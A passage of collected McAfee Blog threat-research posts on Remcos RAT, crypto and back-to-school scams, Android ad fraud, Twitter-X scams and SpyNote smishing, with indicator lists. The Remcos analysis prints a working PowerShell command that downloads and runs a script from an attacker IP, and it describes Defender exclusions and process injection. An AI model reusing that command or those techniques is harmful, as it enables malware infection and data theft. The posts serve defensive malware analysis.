DLL file b257f83495996b9a79d174d60dc02caa b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f
Final payload dd94daef4081f63cf4751c3689045213 abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42

Table 1:Indicators of Compromise

The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.

Peeling Back the Layers of RemcosRat Malware

29 August 2023 at 17:00

Authored by Preksha Saxena

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file. 

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary. 

Execution Flow: 

  

Figure 1: Execution Flow 

Stage 1: Analysis of VBS file 

VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too. 

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below. 

Figure 2:VBS Script 

 One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line. 

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message. 

“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!” 

Figure 3:Deobfuscating PowerShell command using replace function. 

 The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to: 

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();””” 

Stage 2: Analysis of PowerShell script (87656.txt)  

The downloaded file, 87656.txt, is an obfuscated PowerShell script. 

Figure 4:Obfuscated PowerShell Script 

 The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection. 

Figure 5:Resolving IEX 

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm. 

Decompressed data is again a PowerShell script which is analyzed below. 

Stage 3: Analysis of decompressed PowerShell script  

The decompressed PowerShell script is large and obfuscated: 

Figure 6: Decompressed PowerShell script 

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable. 

Figure 7:Deobfuscating PowerShell script 

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage. 

Figure 8: Base64 encoded data. 

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process. 

 Figure 9: Code used for PE injection. 

Windows Defender exclusions are added. 

Figure 10: Exclusion code 

Stage 4: Analysis of decoded PE File  

The 1.1MB PE file is a .NET binary, using an MSIL loader. 

Figure 11: MSIL Loader 

The Main function calls the Units function, which calls a random function. 

Figure 12:Main function 

The random function contains a large amount of encrypted data, stored in a text variable. 

Figure 13: Encrypted data 

The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal). 

Figure 14: code for converting data to uppercase. 

The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below. 

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function. 

Figure 15: RC4 algorithm 

Figure 16: New instance created for decrypted dll 

Stage 5: Analysis of dGXsvRf.dll 

Decrypted DLL ‘dGXsvRf.dll is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload. 

Figure 17: Encrypted payload 

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.  


Figure 18: SykCryptor Encrypted data 

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”. 

Figure 19: RC4 Algorithm 

Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation. 

Figure 20: Loading DLL for deflation. 

The DLL then decrypts a list of various security solution process names: 

Figure 21:Code for decrypting Security processes Names 

The decrypted list of process names include: 

vsserv bdservicehost odscanui bdagent  

bullgaurd BgScan BullGuardBhvScanner etc. 

The malware also drops acopy of itself in the %appdata% folder using cmd. 

Figure 22: Copying file. 

Persistence: 

To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry. 

Figure 23: Persistence Mechanism 

Process Injection: 

The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on. 

Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread. 

Figure 24: Process Injection 

Stage 6: Analysis of final payload 

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are: 

Figure 25: Strings in payload 

The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long. 

Figure 26: RC4 encrypted configuration file 

Decrypted Configuration: 

 Figure 27: Decrypted configuration 

The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware. 

Conclusion: 

RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe. 

Indicators of Compromise (IOCs):  

SHA256  Filetype 
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67  VBS 
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c  PowerShell 
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4  MSIL loader 
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf  SykCrypter 
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517  Remcos Payload 

The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.

Crypto Scam: SpaceX Tokens for Sale

24 August 2023 at 13:19

Authored by: Neil Tyagi  

Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash. 

Crypto scammers use many tactics in other financial crimes, such as pump-and-dump scams that lure investors to purchase an asset with fake claims about its value or outright attempts to steal digital assets. 

This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction. 

It starts with a Tweet used as bait to lure innocent cryptocurrency investors into purchasing a non-existent token, related to a reputed company, SpaceX. 

The theme used here by scammers is the sale of the official cryptocurrency of SpaceX. In the above image we can also see the reach of the tweet is high. (224.4K views) 

 Protection with McAfee+:  

McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites. 

The link present in this tweet redirects to  space[-]launch[.]net, which is already marked as malicious by McAfee. 

A WHOIS search on the site reveals it is hosted on Cloudflare. Cloudflare has increasingly become the number one choice for scammers to host malicious websites and protect their assets. 

A WHOIS lookup on the domain reveals redacted personal information. No surprises there  

When we click on the link, it takes us to a login page and asks for SpaceX login credentials. This page was designed as a phishing page for people who have real SpaceX login credentials. 

 

For people who don’t have SpaceX credentials, they can use the signup link.  

 

After we log in, it redirects to a landing page where one can purchase the supposedly original cryptocurrency launched by SpaceX

 

As you can see, it impersonates as the official SpaceX portal for buying their token. It also has all the elements related to SpaceX and its branding. 

In the above picture, we can see that scammers are employing the social engineering trick of FOMO (Fear Of Missing Out) as they have created a timer showing that the fake tokens are only available for purchase for the next 10 hours. This also makes sure that the scam would end before all the online security vendors flag the site. 

Scammers also allow users to purchase fake tokens from about 22 cryptocurrencies, the prominent being Bitcoin, Ethereum, and USDT. 

 

Scammers even offer a bonus of fake SpaceX tokens if users are ready to purchase a minimum amount

Here we can find the BTC wallet address of the scammers and see the transactions related to these wallets. 

The crypto wallet addresses of scammers for the following currencies are.  

  • BTC bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee 
  • USDT 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 
  • ETH 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 

Looking at transactions related to these addresses, we find people have become victims of this scam by sending payments to these wallets. The Bitcoin wallet above has gathered around 2,780 US dollars. You can also see three of the last transactions made to the account. 

Similarly, for Ethereum, the scammers have gathered around 1,450 US dollars 

We observed two popular cryptocurrencies, but scammers are using about 22 different crypto wallets.  

Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices. 

IOC (Indicator of Compromise)  

Domain  Crypto Type  Wallet address 
space[-]launch[.]net  BTC  bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee 
space[-]launch[.]net  USDT  398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 
space[-]launch[.]net  ETH  16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 
space[-]launch[.]net  XRP  rnmj4xsaaEaGvFbrsg3wCR6Hp2ZvgjMizF 
space[-]launch[.]net  DASH  XxD3tJ7RA81mZffKFiycASMiDsUdqjLFD1 
space[-]launch[.]net  BCH  qr45csehwfm5uu9xu4mqpptsvde46t8ztqkzjlww68 
space[-]launch[.]net  USDC  0x398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 

 

 

 

The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.

Invisible Adware: Unveiling Ad Fraud Targeting Android Users

4 August 2023 at 13:36

Authored by SangRyol Ryu, McAfee Threat Researcher

We live in a world where advertisements are everywhere, and it’s no surprise that users are becoming tired of them. By contrast, developers are driven by profit and seek to incorporate more advertisements into their apps. However, there exist certain apps that manage to generate profit without subjecting users to the annoyance of ads. Is this really good?  

Recently, McAfee’s Mobile Research Team discovered a concerning practice among some apps distributed through Google Play. These apps load ads while the device’s screen is off, which might initially seem convenient for users. However, it’s a clear violation of Google Play Developer policy on how ads should be displayed. This affects not only the advertisers who pay for invisible Ads, but also the users as it drains battery, consumes data and poses potential risks such as information leaks and disruption of user profiling caused by Clicker behavior. 

The team has identified 43 apps that collectively downloaded 2.5 million times. Among the targeted apps are TV/DMB Player, Music Downloader, News, and Calendar applications. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Most apps are no longer available on Google Play while others are updated by the developer. McAfee Mobile Security detects this threat as Android/Clicker. For more information, and to get fully protected, visit McAfee Mobile Security. 

Many affected apps

How does it work? 

This ad fraud library uses specific tactics to avoid detection and inspection. It deliberately delays the initiation of its fraudulent activities, creating a latent period from the time of installation. What’s more, all the intricate configurations of this library can be remotely modified and pushed using Firebase Storage or Messaging service. These factors significantly add to the complexity of identifying and analyzing this fraudulent behavior. Notably, the latent period typically spans several weeks, which makes it challenging to detect. 

Getting latent period by using Firebase Messaging Service 

It is important to be cautious about the implications of granting permissions, such as excluding ‘power saving’ and allowing ‘draw over other apps’. These permissions can enable certain activities to occur discreetly in the background, raising concerns about the intentions and behavior of the applications or libraries in question. Allowing these permissions can result in more malicious behavior, such as displaying phishing pages, also to displaying ads in the background. 

Asked permissions to run in the background and keep it hidden 

When the device screen is turned off after the latent period, the fetching and loading of ads starts, resulting in users being unaware of the presence of running advertisements on their devices. This ad library registers device information by accessing the unique domain (ex: mppado.oooocooo.com) linked with the application. Then go to Firebase Storage to get the specific advertisement URL and show the ads. It is important to note that this process consumes power and mobile data resources. 

Observed traffic when the screen off 

If users quickly turn on their screens at this point, they might catch a glimpse of the ad before it is automatically closed. 

Example of an advertising site displayed when the screen is off 

In conclusion, it is essential for users to exercise caution and carefully evaluate the necessity of granting permissions like power saving exclusion, or draw over other apps before allowing them. While these permissions might be required for certain legitimate functionalities for running in the background, it is important to consider the potential risks linked with them, such as enabling hidden behaviors or reducing the relevance of ads and contents displayed to users because the hidden Clicker behavior. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience. For more information, visit McAfee Mobile Security

 

Indicators of Compromise (IoC’s)

Domains:

best.7080music.com 

m.gooogoole.com 

barocom.mgooogl.com 

newcom.mgooogl.com 

easydmb.mgooogl.com 

freekr.mgooogl.com 

fivedmb.mgooogl.com 

krlive.mgooogl.com 

sixdmb.mgooogl.com 

onairshop.mgooogle.com 

livedmb.mgooogle.com 

krbaro.mgooogle.com 

onairlive.mgooogle.com 

krdmb.mgooogle.com 

onairbest.ocooooo.com 

dmbtv.ocooooo.com 

ringtones.ocooooo.com 

onairmedia.ocooooo.com 

onairnine.ocooooo.com 

liveplay.oocooooo.com 

liveplus.oocooooo.com 

liveonair.oocooooo.com 

eightonair.oocooooo.com 

krmedia.oocooooo.com 

kronair.oocooooo.com 

newkrbada.ooooccoo.com 

trot.ooooccoo.com 

thememusic.ooooccoo.com 

trot.ooooccoo.com 

goodkrsea.ooooccoo.com 

krlive.ooooccoo.com 

news.ooooccoo.com 

bestpado.ooooccoo.com 

krtv.oooocooo.com 

onairbaro.oooocooo.com 

barolive.oooocooo.com 

mppado.oooocooo.com 

dmblive.oooocooo.com 

baromedia.oooocooo.com 

musicbada.oouooo.com 

barolive.oouooo.com 

sea.oouooo.com 

blackmusic.oouooo.com 

Android Packages 

Package Name  Application Name  SHA256  Google Play Downloads 
band.kr.com  DMB TV  f3e5aebdbd5cd94606211b04684730656e0eeb1d08f4457062e25e7f05d1c2d1  10,000+ 
com.dmb.media  DMB TV  6aaaa6f579f6a1904dcf38315607d6a5a2ca15cc78920743cf85cc4b0b892050  100,000+ 
dmb.onair.media  DMB TV  a98c5170da2fdee71b699ee145bfe4bdcb586b623bbb364a93bb8bdf8dbc4537  10,000+ 
easy.kr  DMB TV  5ec8244b2b1f516fd96b0574dc044dd40076ff7aa7dadb02dfefbd92fc3774bf  100,000+ 
kr.dmb.onair  DMB TV  e81c0fef52065864ee5021e1d4c7c78d6a407579e1d48fc4cf5551ff0540fdb8  5,000+ 
livedmb.kr  DMB TV  33e5606983526757fef2f6c1da26474f4f9bf34e966d3c204772de45f42a6107  50,000+ 
stream.kr.com  DMB TV  a13e26bce41f601a9fafdec8003c5fd14908856afbab63706b133318bc61b769  100+ 
com.breakingnews.player  뉴스 속보  d27b8e07b7d79086af2fa805ef8d77ee51d86a02d81f2b8236febb92cb9b242d  10,000+ 
jowonsoft.android.calendar  달력  46757b1f785f2b3cec2906a97597b7db4bfba168086b60dd6d58d5a8aef9e874  10,000+ 
com.music.free.bada  뮤직다운  a3fe9f9b531ab6fe79ed886909f9520a0d0ae98cf11a98f061dc179800aa5931  100,000+ 
com.musicdown  뮤직다운  5f8eb3f86fc608f9de495ff0e65b866a78c25a9260da04ebca461784f039ba16  5,000+ 
new.kr.com  뮤직다운  397373c39352ef63786fe70923a58d26cdf9b23fa662f3133ebcbc0c5b837b66  100,000+ 
baro.com  바로TV  3b4302d00e21cbf691ddb20b55b045712bad7fa71eb570dd8d3d41b8d16ce919  10,000+ 
baro.live.tv  바로TV  760aa1a6c0d1e8e4e2d3258e197ce704994b24e8edfd48ef7558454893796ebe  50,000+ 
baro.onair.media  바로TV  b83a346e18ca20ac5165bc1ce1c8807e89d05abc6a1df0adc3f1f0ad4bb5cd0c  10,000+ 
kr.baro.dmb  바로TV  84a4426b1f8ea2ddb66f12ef383a0762a011d98ff96c27a0122558babdaf0765  100,000+ 
kr.live  바로TV  cccfdf95f74add21da546a03c8ec06c7832ba11091c6d491b0aadaf0e2e57bcc  1,000+ 
newlive.com  바로TV  c76af429fabcfd73066302eeb9dd1235fd181583e6ee9ee9015952e20b4f65bf  50,000+ 
onair.baro.media  바로TV  6c61059da2ae3a8d130c50295370baad13866d7e5dc847f620ad171cc01a39e9  10,000+ 
freemusic.ringtone.player  벨소리 무료다운  75c74e204d5695c75209b74b10b3469babec1f7ef84c7a7facb5b5e91be0ae3e  100,000+ 
com.app.allplayer  실시간 TV  8d881890cfa071f49301cfe9add6442d633c01935811b6caced813de5c6c6534  50,000+ 
com.onair.shop  실시간 TV  1501dd8267240b0db0ba00e7bde647733230383d6b67678fc6f0c7f3962bd0d3  50,000+ 
eight.krdmb.onair  실시간 TV  bbd6ddbfee7482fe3fe8b5d96f3be85e09352711a36cd8cf88cfdeaf6ff90c79  10,000+ 
free.kr  실시간 TV  5f864aa88de07a10045849a7906f616d079eef94cd463e40036760f712361f79  10,000+ 
kr.dmb.nine  실시간 TV  ea49ad38dd7500a6ac12613afe705eb1a4bcab5bcd77ef24f2b9a480a34e4f46  100,000+ 
kr.live.com  실시간 TV  f09cff8a05a92ddf388e56ecd66644bf88d826c5b2a4419f371721429c1359a7  10,000+ 
kr.live.onair  실시간 TV  e8d2068d086d376f1b78d9e510a873ba1abd59703c2267224aa58d3fca2cacbd  100,000+ 
kr.live.tv  실시간 TV  1b64283e5d7e91cae91643a7dcdde74a188ea8bde1cf745159aac76a3417346e  50,000+ 
kr.media.onair  실시간 TV  bd0ac9b7717f710e74088df480bde629e54289a61fc23bee60fd0ea560d39952  100,000+ 
kr.onair.media  실시간 TV  d7dd4766043d4f7f640c7c3fabd08b1a7ccbb93eba88cf766a0de008a569ae4d  1,000+ 
live.kr.onair  실시간 TV  b84b22bc0146f48982105945bbab233fc21306f0f95503a1f2f578c1149d7e46  10,000+ 
live.play.com  실시간 TV  516032d21edc2ef4fef389d999df76603538d1bbd9d357a995e3ce4f274a9922  50,000+ 
new.com  실시간 TV  5d07a113ce389e430bab70a5409f5d7ca261bcdb47e4d8047ae7f3507f044b08  50,000+ 
newlive.kr  실시간 TV  afc8c1c6f74abfadd8b0490b454eebd7f68c7706a748e4f67acb127ce9772cdb  100,000+ 
onair.best  실시간 TV  6234eadfe70231972a4c05ff91be016f7c8af1a8b080de0085de046954c9e8e7  50,000+ 
com.m.music.free  음악다운  ded860430c581628ea5ca81a2f0f0a485cf2eeb9feafe5c6859b9ecc54a964b2  500,000+ 
good.kr.com  음악다운  bede67693a6c9a51889f949a83ff601b1105c17c0ca5904906373750b3802e91  100,000+ 
new.music.com  음악다운  fee6cc8b606cf31e55d85a7f0bf7751e700156ce5f7376348e3357d3b4ec0957  1,000+ 
play.com.apps  음악다운  b2c1caab0e09b4e99d5d5fd403c506d93497ddb2de3e32931237550dbdbe7f06  100,000+ 
com.alltrot.player  트로트 노래모음  469792f4b9e4320faf0746f09ebbcd8b7cd698a04eef12112d1db03b426ff70c  50,000+ 
com.trotmusic.player  트로트 노래모음  879014bc1e71d7d14265e57c46c2b26537a81020cc105a030f281b1cc43aeb77  5,000+ 
best.kr.com  파도 MP3  f2bbe087c3b4902a199710a022adf8b57fd927acac0895ab85cfd3e61c376ea5  100,000+ 
com.pado.music.mp3  파도 MP3  9c84c91f28eadd0a93ef055809ca3bceb10a283955c9403ef1a39373139d59f2  100,000+ 

 

 

The post Invisible Adware: Unveiling Ad Fraud Targeting Android Users appeared first on McAfee Blog.

The Season of Back to School Scams

2 August 2023 at 19:26

Authored by: Lakshya Mathur and Yashvi Shah 

As the Back-to-School season approaches, scammers are taking advantage of the opportunity to deceive parents and students with various scams. With the increasing popularity of online shopping and digital technology, people are more inclined to make purchases online. Scammers have adapted to this trend and are now using social engineering tactics, such as offering high discounts, free school kits, online lectures, and scholarships, to entice unsuspecting individuals into falling for their schemes. 

McAfee Labs has found the following PDFs targeting back-to-school trends. This blog is a reminder for parents on what to educate their children on and how not to fall victim to such fraud.

Fake captcha PDFs campaign 

McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction. The second page contained substantial content on back-to-school advice for parents and students, giving the appearance of a legitimate document. These tactics were employed to make the PDF seem authentic, entice consumers to click on the fake CAPTCHA link, and evade detection. 

Figure 1Fake CAPTCHA and scammy link 

Figure 2 – PDF Second Page

Figure 3 – Zoomed in content from Figure 2

As shown in Figure 1, there is a fake captcha image that, when clicked, redirects to a URL displayed at the bottom left of the figure. This URL has a Russian domain and goes through multiple redirections before reaching its destination. The scam URL contains the text “all hallows prep school uniform,” and leads to a malicious site that sets cookies, monitors user behavior, and collects interactions, sending the data to servers owned by the domain’s operators. 

Figures 2 and 3 display the second page of the PDF, designed to appear legitimate to users and spam and security scanners. 

In this campaign, we identified a total of 13 domains, with 11 being of Russian origin and 2 from South Africa. You can find the complete list of these domains in the final IOC (Indicators of Compromise) section. 

All domains were created between 2020 and 2021 and use Cloudflare’s name servers. 

Geographical Distribution 

These domains were discovered operating worldwide, targeting consumers across various countries. The United States and India stood out as the top countries where users were most often targeted. 

Figure 4 – Geographical distribution of all the scam domains 

What more to expect? 

As the season begins, the scenario is only the beginning of back-to-school scam season. Parents and students should remain vigilant against fraud, such as: 

  • Shopping scams: During back-to-school season, scammers employ various tactics: setting up fake online stores offering discounted school supplies, uniforms, and gadgets, but delivering substandard or nonexistent products; spreading fraudulent social media ads with enticing deals that lead to fake websites collecting personal information and payment details; and sending fake package delivery emails, tricking recipients into clicking on malicious links to perform phishing and malware attacks.  
  • Tax/Loan free scams: Scammers target students and parents with student loan forgiveness scams, offering false debt reduction programs in exchange for upfront payments or personal information. They also entice victims with fake scholarships or grants, prompting fees or sensitive data, while no genuine assistance exists. Unsolicited calls from scammers posing as government agencies or loan providers add to the deception, using high-pressure tactics to extract personal information or immediate payments. 
  • Identity theft: Scammers employ various identity theft tactics to exploit students and parents: attempting unauthorized access to school databases for personal information, creating fake enrollment forms to collect sensitive data, and sending phishing emails posing as educational institutions or retailers to trick victims into sharing personal information or login credentials. 
  • Deepfake AI Voice scams: Scammers might use deepfake AI technology to create convincing voice recordings of school administrators, teachers, or students. They can pose as school officials to deceive parents into making urgent payments or sharing personal information. Additionally, scammers might mimic students’ or teachers’ voices to solicit fraudulent fundraisers for fake school programs or claim that students have won scholarships or prizes to trick them into paying fees or revealing sensitive information. These scams exploit the trust and urgency surrounding back-to-school activities. 

How to Stay Protected? 

  • Be skeptical, if something appears to be too good to be true, it probably is.  
  • Exercise caution when registering or sharing personal information on questionable sites. 
  • Stay informed about these scams to safeguard yourself 
  • Maintain a skeptical approach towards unsolicited calls and emails. 
  • Keep your anti-virus and web protection up to date and perform regular full scans on your devices. 

IOC (Indicator of Compromise) 

Filetype/URL  Value 
PDF  474987c34461cb4bd05b81d040cae468ca5b88e891da4d944191aa819a86ff21 
426ad19eb929d0214254340f3809648cfb0ee612c8374748687f5c119ab1a238 
5cb6ecc4af42075fa822d2888c82feb2053e67f77b3a6a9db6501e5003694aba 
Domain  traffine[.]ru 
leonvi[.]ru 
trafffi[.]ru 
norin[.]co[.]za 
gettraff[.]ru 
cctraff[.]ru 
luzas.yubit[.]co[.]za 
ketchas[.]ru 
maypoin[.]ru 
getpdf.pw 
traffset[.]ru 
jottigo[.]ru 
trafffe[.]ru 

The post The Season of Back to School Scams appeared first on McAfee Blog.

Scammers Follow the Rebranding of Twitter to X, to Distribute Malware

25 July 2023 at 15:28

Authored by: Vallabh Chole and Yerko Grbic

On July 23rd, 2023, Elon Musk announced that the social networking site, Twitter was rebranding as “X”. The news propelled Twitter and X to gain headlines and become the top trending topics on popular social media platforms. 

Scammers pounced on this opportunity and started renaming various hacked YouTube and other social media accounts to “twitter-x” and “twitter fund” to promote scam links with new X branding. 

Figure 1. Twitter-X-themed YouTube Live Stream by scammer 

 

Figure 2. Twitter X Crypto Scam 

 

This type of scam has been active for some time and uses an innovative approach to lure victims. To make this scam more authentic, attackers target famous Influencers with sponsorship emails that contain password-stealing malware as email attachments. When password stealer malware is executed, the influencers session cookies (unique access tokens) are stolen and uploaded to attacker-controlled systems. 

Figure 3. Malware Flow Chart  

 

After the influencers account has been compromised, the scammer starts to rename channels, in this case to “Twitter CEO” and then the scammers start to live stream an Elon Musk video on YouTube. They post web links for new scam sites in chat, and target YouTube accounts with a large number of subscribers. On other social media platforms, such as Instagram and Twitter, they use compromised accounts to follow users and post screenshots with captions, such as “Thanks Mr.Elon”. If we look for these terms on Instagram, we observe thousands of similar posts. Compromised accounts are also used to post videos for software/game applications, which are malware masquerading as legitimate software or games. These videos demonstrate how to download and execute files, which are common password-stealing malware, and distributed through compromised social media accounts.

Protection with McAfee+: 

 McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.

Figure 4. McAfee WebAdvisor detection 

 

Below is a detection heatmap for scam URL’s targeting twitter-x and promoting crypto scams  

Figure 5. Scam URL Detection Heatmap 

 

Figure 6. Password stealer Heatmap 

 

Indicators of Compromise: 

Scam Site  Crypto Type  Wallet   
twitter-x[.]org  ETH   0xB1706fc3671115432eC9a997F802aC79CD7f378a   
twitter-x[.]org  BTC   1KtgaAjBETdcXiAdGsXJMePT4AEGWqtsug   
twitter-x[.]org  USDT   0xB1706fc3671115432eC9a997F802aC79CD7f378a   
twitter-x[.]org  DOGE   DLCmD43eZ6hPxZVzc8C7eUL4w8TNrBMw9J   

 

The post Scammers Follow the Rebranding of Twitter to X, to Distribute Malware appeared first on McAfee Blog.

Android SpyNote attacks electric and water public utility users in Japan

21 July 2023 at 07:00

Authored by Yukihiro Okutomi 

McAfee’s Mobile team observed a smishing campaign against Japanese Android users posing as a power and water infrastructure company in early June 2023. This campaign ran for a short time from June 7. The SMS message alerts about payment problems to lure victims to a phishing website to infect the target devices with a remote-controlled SpyNote malware. In the past, cybercriminals have often targeted financial institutions. However, on this occasion, public utilities were the target to generate a sense of urgency and push victims to act immediately. Protect your Android and iOS mobile devices with McAfee Mobile Security.

Smishing Attack Campaign 

A phishing SMS message impersonating a power or water supplier claims a payment problem, as shown in the screenshot below. The URL in the message directs the victim to a phishing website to download mobile malware. 

Notice of suspension of power transmission because of non-payment of charges from a power company in Tokyo (Source: Twitter) 

Notice of suspension of water supply because of non-payment of charges from a water company in Tokyo (Source: Twitter) 

 

When accessed with a mobile browser, it will start downloading malware and display a malware installation confirmation dialog. 

The confirmation dialog of Spyware installation via browser (Source: Twitter) 

SpyNote malware 

SpyNote is a known family of malware that proliferated after its source code was leaked in October 2022. Recently, the malware was used in a campaign targeting financial institutions in January and targeting Bank of Japan in April 2023 

The SpyNote malware is remotely controlled spyware that exploits accessibility services and device administrator privileges. It steals device information and sensitive user information such as device location, contacts, incoming and outgoing SMS messages, and phone calls. The malware deceives users by using legitimate app icons to look real. 

Application Icons disguised by malware. 

After launching the malware, the app opens a fake settings screen and prompts the user to enable the Accessibility feature. When the user clicks the arrow at the bottom of the screen, the system Accessibility service settings screen is displayed. 

A fake setting screen (left), system setting screen (center and right) 

By allowing the Accessibility service, the malware disables battery optimization so that it can run in the background and automatically grants unknown source installation permission to install another malware without the user’s knowledge. In addition to spying on the victim’s device, it also steals two-factor authentication on Google Authenticator and Gmail and Facebook information from the infected device. 

Although the distribution method is different, the step of requesting Accessibility service after launching the app is similar to the case of the Bank of Japan that occurred in April. 

Scammers keep up with current events and attempt to impersonate well-known companies that have a reason to reach out to their customers. The mobile malware attack using SpyNote discovered this time targets mobile apps for life infrastructure such as electricity and water. One of the reasons for this is that electric bills and water bills, which used to be issued on paper, are now managed on the web and mobile app. If you want to learn about smishing, consult this article “What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe”. McAfee Mobile Security detects this threat as Android/SpyNote and alerts mobile users if it is present and further protects them from any data loss. For more information, visit McAfee Mobile Security. 

Indicators of compromise (IoC) 

C2 Server: 

  • 104.233.210.35:27772 

Malware Samples: 

SHA256 Hash  Package name  Application name 
075909870a3d16a194e084fbe7a98d2da07c8317fcbfe1f25e5478e585be1954  com.faceai.boot  キャリア安全設定 
e2c7d2acb56be38c19980e6e2c91b00a958c93adb37cb19d65400d9912e6333f  com.faceai.boot  東京電力 
a532c43202c98f6b37489fb019ebe166ad5f32de5e9b395b3fc41404bf60d734  com.faceai.boot  東京電力TEPCO 
cb9e6522755fbf618c57ebb11d88160fb5aeb9ae96c846ed10d6213cdd8a4f5d  com.faceai.boot  東京電力TEPCO 
59cdbe8e4d265d7e3f4deec3cf69039143b27c1b594dbe3f0473a1b7f7ade9a6  com.faceai.boot  東京電力TEPCO 
8d6e1f448ae3e00c06983471ee26e16f6ab357ee6467b7dce2454fb0814a34d2  com.faceai.boot  東京電力TEPCO 
5bdbd8895b9adf39aa8bead0e3587cc786e375ecd2e1519ad5291147a8ca00b6  com.faceai.boot  東京電力TEPCO 
a6f9fa36701be31597ad10e1cec51ebf855644b090ed42ed57316c2f0b57ea3c  com.faceai.boot  東京電力TEPCO 
